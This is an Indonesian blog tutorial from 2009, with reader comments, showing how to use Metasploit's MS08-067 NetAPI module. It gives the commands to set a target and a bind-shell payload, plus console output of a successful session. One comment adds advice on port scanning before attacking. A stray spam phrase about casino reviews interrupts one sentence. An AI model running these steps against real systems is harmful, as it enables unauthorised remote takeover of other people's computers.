Metasploit Tutorial [newbee Edition]

Posted on 4 May 2009 by

Setelah tersampaikan materi bertemakan Hacking and Security di acara workshop KCS 2009 kamis kemarin, barangkali masih ada yang belum “ngeh” dengan materi yang diberikan, terutama dibagian pemberdayagunaan x-sploit yang berframework..  :??

Jadi, tak buatken tutorial ini, kwkkw… [sebenarnya hanya copas dari blog gw dink…] :D

===============================================================================

Seperti yang telah kita ketahui, metasploit framework adalah sebuah penetration tool yang cukup powerfull dalam melakukan sebuah penestrasi ke sebuah system. Dan ini bisa menjadi sebuah pedang yang mempunyai 2 sisi, digunakan sebagai analyst system tool atau digunakan untuk melakukan kegiatan negatif yang berakhir pada attacking. Melalui artikel ini, saya memberikan salah satu contoh penggunaan MF dalam melakukan sesi gaining access.

Kali ini kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu). So, let”s use linux friends.. ;p

Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau nbso online casino reviews sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya..

Pertama anda siapkan metasploit dengan update terbaru
(cara ini berlaku untuk minimal versi framework 3.2-testing.5773)

msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773

lalu anda pilih modul exlpoitnya, seperti berikut :

msf > use windows/smb/ms08_067_netapi

untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :

msf exploit(ms08_067_netapi) > show options

lalu anda set target

msf exploit(ms08_067_netapi) > set RHOST 192.168.54.xx
RHOST => 192.168.54.xx

kemudian anda set PAYLOAD

msf exploit(ms08_067_netapi) > set PAYLOAD Generic/Shell_Bind_TCP

Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih Generic/Shell_Bind_TCP, maksudnya kita akan mengambil alih Shell Bind (kalau di lingkungan windows dikenal sebagai Command Prompt) dari target hacking kita.
Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.

kemudian tinggal jalankan EXPLOIT-nya :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.54.xx:4444)

Dan jika berhasil maka anada akan disuguhi sebuah window baru berisi sebuah layar Command Prompt dari komputer target dan anda mempunyai level administrator.

Oh ya, cara diatas memang sengaja saya gunakan MF yang versi console, sebenarnya ada versi GUI-nya dan juga yang WEB based.
Saya menggunakan console karena saya tertarik dengan quote dari distro linux xcode : hacker tidak membutuhkan tampilan yang memukau ;p
Namun, keputusan akhir terserah pada anda.

Reference :
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://blog.delaforta.net/

Demikian semoga bisa bermanfaat bagi rekan-rekan sekalian.

Related Post

42 Comments

dika II

23 June 2011

bagus tutornya.. tapi harusnya ada yang tidak newbie edition donk mas..


harly

22 June 2011

kayaknya ada sedikit pencerahan walaupun belum begitu mengerti…


T.C. UK

14 April 2011

klo mo exploit masa harus setting kompie windows lawan dulu dan mengubah DEP sie…???


freeze crazy backdoor

14 February 2011

maaf bang.. tuto ini ni.. uda kelewatan jadul..
pa lagi isi2 di dalemnya ni yee… kayak ” nembak di atas kuda”.. hehehe…

kalo mau exploit bang, jgn langsung di tentuin targetnya, lebih baik,.. di scan dulu tuu, mesin sama OS nya si target..

ato kalo perlu multi scan semua kompi g ada di jaringan loo… biar lo tau lo bisa lewat mana…

maksudnya ni yee.. port apa aja yg open.. kalo 139, 445.. yaa… ada kesempatan deh buat exploit..
tapi kalo lo ga tau portnya ke buka ato nggak. yaa.. biar di coba brapa kali pun nggak kan bisa… wkwkwk…thanks!!
ID NAME : FREEZE C. BACKDOOR


sheroazura

14 February 2011

klo mo exploit masa harus setting kompie windows lawan dulu dan mengubah DEP sie…???gk ada cara yang praktis ta?..misalnya membypass walau DEP masih aktif


Post a Comment

Your email is never shared.